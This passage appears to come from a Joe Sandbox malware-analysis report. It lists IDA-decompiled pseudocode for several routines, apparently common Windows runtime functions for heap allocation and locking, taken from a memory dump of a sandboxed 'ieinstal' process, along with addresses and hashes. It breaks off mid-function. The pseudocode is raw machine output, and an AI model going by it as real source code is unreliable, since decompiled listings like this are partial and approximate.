                                                            0x1ec861d9
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec861df
                                                            0x1ec861e2
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec861e6
                                                            0x1ec861e8
                                                            0x1ec861ee
                                                            0x1ec861ee
                                                            0x1ec861f9
                                                            0x1ecc762f
                                                            0x1ecc7632
                                                            0x1ecc7635
                                                            0x1ecc7639
                                                            0x1ecc7640
                                                            0x1ecc766e
                                                            0x1ecc7675
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc7681
                                                            0x1ecc7689
                                                            0x1ecc768d
                                                            0x1ecc7691
                                                            0x1ecc7695
                                                            0x1ecc7699
                                                            0x1ecc76af
                                                            0x1ecc76b5
                                                            0x1ecc76b7
                                                            0x1ecc76b7
                                                            0x1ecc76d7
                                                            0x1ecc76dc
                                                            0x00000000
                                                            0x1ecc76dc
                                                            0x1ecc76a2
                                                            0x1ecc76a9
                                                            0x1ecc7651
                                                            0x1ecc7653
                                                            0x1ecc7653
                                                            0x1ecc7656
                                                            0x1ecc7656
                                                            0x00000000
                                                            0x1ecc7656
                                                            0x1ecc7644
                                                            0x1ecc7646
                                                            0x1ecc7648
                                                            0x1ecc7648
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa370f0289f2460fc6644ea686ee521ccb2ad434114e5c748f445472d844e18b
                                                            • Instruction ID: a8a02752ad37ecd2ef3eed4e1f00242c41d8952082dbf990cc3c1dc182c1bc4b
                                                            • Opcode Fuzzy Hash: fa370f0289f2460fc6644ea686ee521ccb2ad434114e5c748f445472d844e18b
                                                            • Instruction Fuzzy Hash: 233149726157418FD350CF1ACD50B1AB7E6FB88B04F014A6DF9989B355E7B0E844CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC98EC7 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E1EC98EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x1ed4d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E1EC84E70(0x1ed486e4, 0x1ec99490, 0, 0);
					if( *0x1ed453e8 > 5 && E1EC98F33(0x1ed453e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x1ed453e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x1ed453e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x1ec3bc46;
						_t48 = E1ECD7B9C(0x1ed453e8, 0x1ec3bc46, _t67, 0x1ed453e8, _t70,  &_v140);
					}
				}
				return E1EC9B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                            0x1ec98ec7
                                                            0x1ec98ed9
                                                            0x1ec98edc
                                                            0x1ec98ee6
                                                            0x1ec98ee9
                                                            0x1ec98eee
                                                            0x1ec98efc
                                                            0x1ec98f08
                                                            0x1ecd1349
                                                            0x1ecd1353
                                                            0x1ecd135d
                                                            0x1ecd1366
                                                            0x1ecd136f
                                                            0x1ecd1375
                                                            0x1ecd137c
                                                            0x1ecd1385
                                                            0x1ecd1390
                                                            0x1ecd1391
                                                            0x1ecd139c
                                                            0x1ecd139d
                                                            0x1ecd13a6
                                                            0x1ecd13ac
                                                            0x1ecd13b2
                                                            0x1ecd13b5
                                                            0x1ecd13bc
                                                            0x1ecd13bf
                                                            0x1ecd13c2
                                                            0x1ecd13c5
                                                            0x1ecd13c8
                                                            0x1ecd13cb
                                                            0x1ecd13ce
                                                            0x1ecd13d1
                                                            0x1ecd13d4
                                                            0x1ecd13d7
                                                            0x1ecd13da
                                                            0x1ecd13dd
                                                            0x1ecd13e0
                                                            0x1ecd13e3
                                                            0x1ecd13e6
                                                            0x1ecd13e9
                                                            0x1ecd13f6
                                                            0x1ecd1400
                                                            0x1ecd1400
                                                            0x1ec98f08
                                                            0x1ec98f32

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5372174c89e7a99747eacbc54a73dea684e654e2422032101b434e7d93b5bc82
                                                            • Instruction ID: ed06fd1089f270ebd6a89e5b20911de65a974d0e9c4154a8af2fbd85d57ff0f8
                                                            • Opcode Fuzzy Hash: 5372174c89e7a99747eacbc54a73dea684e654e2422032101b434e7d93b5bc82
                                                            • Instruction Fuzzy Hash: 7F4181B5D00358DEDB14CFAAD980AAEFBF5BB48710F5042AEE509A7640EB705A85CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC94A2C Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E1EC94A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x1ed4d360 ^ _t62;
				_v8 =  *0x1ed4d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E1EC72280(_t26, 0x1ed48608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E1EC6FFB0(_t41, _t51, 0x1ed48608);
						L2:
						 *0x1ed4b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E1EC9B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E1EC72280(_t28, 0x1ed48608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E1EC6FFB0(_t42, _t53, 0x1ed48608);
							if(_t53 != 0) {
								L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E1EC6FFB0(_t41, _t51, 0x1ed48608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                            0x1ec94a2c
                                                            0x1ec94a34
                                                            0x1ec94a3c
                                                            0x1ec94a3e
                                                            0x1ec94a48
                                                            0x1ec94a4b
                                                            0x1ec94a4d
                                                            0x1ec94a51
                                                            0x1ec94a9c
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec94aa3
                                                            0x1ec94aa8
                                                            0x1ec94aad
                                                            0x1ec94ab1
                                                            0x1ec94ade
                                                            0x1ec94ae3
                                                            0x1ec94a5a
                                                            0x1ec94a62
                                                            0x1ec94a6a
                                                            0x1ec94a6e
                                                            0x1eccf203
                                                            0x1ec94a84
                                                            0x1ec94a88
                                                            0x1ec94a89
                                                            0x1ec94a8a
                                                            0x1ec94a95
                                                            0x1ec94a95
                                                            0x1ec94a79
                                                            0x1ec94a80
                                                            0x1ec94af2
                                                            0x1ec94af4
                                                            0x1ec94af9
                                                            0x1ec94aff
                                                            0x1ec94b01
                                                            0x1ec94b03
                                                            0x1ec94b08
                                                            0x1eccf20a
                                                            0x1eccf212
                                                            0x1eccf216
                                                            0x1eccf216
                                                            0x1ec94b08
                                                            0x1ec94b13
                                                            0x1ec94b1a
                                                            0x1eccf229
                                                            0x1eccf229
                                                            0x1ec94b1a
                                                            0x1ec94a82
                                                            0x00000000
                                                            0x1ec94a82
                                                            0x1ec94ab7
                                                            0x1ec94acd
                                                            0x1ec94acd
                                                            0x1ec94ad5
                                                            0x1ec94ada
                                                            0x00000000
                                                            0x1ec94ada
                                                            0x1ec94ac2
                                                            0x1ec94acb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec94acb
                                                            0x1ec94a53
                                                            0x1ec94a53
                                                            0x1ec94a58
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7f6d27a765010654af336d5e832788065e80af6753fada634f7afde8057c325
                                                            • Instruction ID: 7e23c5cb2d20f1c84d1e64cc4b63aebcc3a7685d3d48183a14cc50fe5fffb991
                                                            • Opcode Fuzzy Hash: f7f6d27a765010654af336d5e832788065e80af6753fada634f7afde8057c325
                                                            • Instruction Fuzzy Hash: 95312F366016A19BC321CF15CDC0B1AFBE6FF86710F110B29E8554B648CF70E855DB86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8E730 Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 74%
                                                            			E1EC8E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E1EC99670() < 0) {
					L1ECADF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1ed47b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L1EC74620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M1EC8E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                            0x1ec8e730
                                                            0x1ec8e736
                                                            0x1ec8e738
                                                            0x1ec8e73d
                                                            0x1ec8e73e
                                                            0x1ec8e740
                                                            0x1ec8e749
                                                            0x1ec8e765
                                                            0x1ec8e76a
                                                            0x1ec8e76b
                                                            0x1ec8e76c
                                                            0x1ec8e76d
                                                            0x1ec8e76e
                                                            0x1ec8e76f
                                                            0x1ec8e775
                                                            0x1ec8e777
                                                            0x1ec8e77e
                                                            0x1eccb675
                                                            0x1ec8e784
                                                            0x1ec8e784
                                                            0x1ec8e789
                                                            0x1ec8e7a8
                                                            0x1ec8e7ac
                                                            0x1ec8e807
                                                            0x1ec8e7ae
                                                            0x1ec8e7ae
                                                            0x1ec8e7b1
                                                            0x1ec8e7b4
                                                            0x1ec8e7b9
                                                            0x1ec8e7c0
                                                            0x1ec8e7c4
                                                            0x1ec8e7ca
                                                            0x1ec8e7cc
                                                            0x00000000
                                                            0x1ec8e7d3
                                                            0x1ec8e7d6
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8e7ff
                                                            0x1ec8e802
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8e7f9
                                                            0x1ec8e7fc
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8e7f3
                                                            0x1ec8e7f6
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8e7ed
                                                            0x1ec8e7f0
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8e7e7
                                                            0x1ec8e7ea
                                                            0x00000000
                                                            0x00000000
                                                            0x1eccb685
                                                            0x1eccb688
                                                            0x00000000
                                                            0x00000000
                                                            0x1eccb682
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8e7cc
                                                            0x1ec8e7d9
                                                            0x1ec8e7dc
                                                            0x1ec8e7de
                                                            0x1ec8e7de
                                                            0x1ec8e7ac
                                                            0x1ec8e7e4
                                                            0x1ec8e74b
                                                            0x1ec8e751
                                                            0x1ec8e759
                                                            0x1ec8e761
                                                            0x1ec8e761

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 506cfaefcea73fb85c8564d0ec476cb45c81ef08703ea3c4e32bfc375df01dc1
                                                            • Instruction ID: f9267e41197b4c302aeab68a5658ebcd4cdf5fe9414613d04597d67dfe880d8d
                                                            • Opcode Fuzzy Hash: 506cfaefcea73fb85c8564d0ec476cb45c81ef08703ea3c4e32bfc375df01dc1
                                                            • Instruction Fuzzy Hash: 303159B5A14249AFD744CF69CD41F8ABBE4FB09714F148666F948CB341E631ED80CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8BC2C Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E1EC8BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1ed46100; // 0x69
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E1EC72280(0xd, 0x9a25f1a0);
				_t41 =  *0x1ed460f8; // 0x0
				if(_t41 != 0) {
					 *0x1ed460f8 =  *_t41;
					 *0x1ed460fc =  *0x1ed460fc + 0xffff;
				}
				E1EC6FFB0(_t41, 0x800, 0x9a25f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x1ed460f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L1EC74620(0x1ed46100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1ed46100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                            0x1ec8bc36
                                                            0x1ec8bc42
                                                            0x1ec8bc45
                                                            0x1ec8bc4a
                                                            0x1ec8bd35
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8bc50
                                                            0x1ec8bc50
                                                            0x1ec8bc58
                                                            0x1ec8bc5a
                                                            0x1ec8bc60
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecca4f2
                                                            0x1ecca4f6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecca4fc
                                                            0x1ec8bc79
                                                            0x1ec8bc7e
                                                            0x1ec8bc86
                                                            0x1ec8bd16
                                                            0x1ec8bd20
                                                            0x1ec8bd20
                                                            0x1ec8bc8d
                                                            0x1ec8bc94
                                                            0x1ec8bcbd
                                                            0x1ec8bcca
                                                            0x1ec8bccb
                                                            0x1ec8bccc
                                                            0x1ec8bccd
                                                            0x1ec8bcce
                                                            0x1ec8bcd4
                                                            0x1ec8bcea
                                                            0x1ec8bcee
                                                            0x1ec8bcf2
                                                            0x1ec8bd00
                                                            0x1ec8bd04
                                                            0x00000000
                                                            0x1ec8bc96
                                                            0x1ec8bcab
                                                            0x1ec8bcaf
                                                            0x1ec8bd2c
                                                            0x1ec8bd2c
                                                            0x1ec8bd09
                                                            0x00000000
                                                            0x1ec8bd09
                                                            0x1ec8bcb1
                                                            0x1ec8bcb5
                                                            0x1ec8bcbb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec8bcbb

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 573510365d43f359b42c7a2c6c531dfec93d2db36f1511628ecbf3b974b9b72a
                                                            • Instruction ID: 9a5def1849e70a1ffe78b5413b1da46e0c717c8aede3831fe32cd5e614776d80
                                                            • Opcode Fuzzy Hash: 573510365d43f359b42c7a2c6c531dfec93d2db36f1511628ecbf3b974b9b72a
                                                            • Instruction Fuzzy Hash: 7F31257AA00656EBCB01DF59C9C0BD673B4FF28318F110279EC56DB609EB74D9068B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC81DB5 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E1EC81DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E1EC7F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L1EC74620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E1EC7F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                            0x1ec81dc2
                                                            0x1ec81dc5
                                                            0x1ec81dc7
                                                            0x1ec81dcc
                                                            0x1ec81dce
                                                            0x1ec81dd6
                                                            0x1ec81ddf
                                                            0x1ec81de0
                                                            0x1ec81de1
                                                            0x1ec81de5
                                                            0x1ec81de8
                                                            0x1ec81def
                                                            0x1ec81df0
                                                            0x1ec81df6
                                                            0x1ec81df7
                                                            0x1ec81dfe
                                                            0x1ec81e1a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec81e0b
                                                            0x1ec81e12
                                                            0x1ec81e12
                                                            0x1ec81e00
                                                            0x1ec81e00
                                                            0x1ec81e05
                                                            0x1ec81e1e
                                                            0x1ec81e23
                                                            0x1ecc570f
                                                            0x1ecc5713
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5719
                                                            0x1ecc5719
                                                            0x1ec81e2c
                                                            0x1ec81e2d
                                                            0x1ec81e2e
                                                            0x1ec81e2f
                                                            0x1ec81e31
                                                            0x1ec81e32
                                                            0x1ec81e35
                                                            0x1ec81e3d
                                                            0x1ecc5723
                                                            0x1ecc573d
                                                            0x1ecc573d
                                                            0x00000000
                                                            0x1ecc5723
                                                            0x1ec81e49
                                                            0x1ec81e4e
                                                            0x1ec81e4e
                                                            0x1ec81e09
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                            • Instruction ID: af65f596dbea3d3bc4e5f503b806f825b2f3120b6b2bd7da9d62c2579c780f3e
                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                            • Instruction Fuzzy Hash: FB21AE76A00159EFC721CF9ACD94EABBBFDFF85654F114255E90197210D730AE41CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC59100 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 76%
                                                            			E1EC59100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x1ed2f6e8);
				E1ECAD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E1ED288F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E1ECAD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x1ed486c0; // 0x2e507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x1ed486b8; // 0x2ebb6e0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E1EC72280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E1ED288F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E1EC9AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
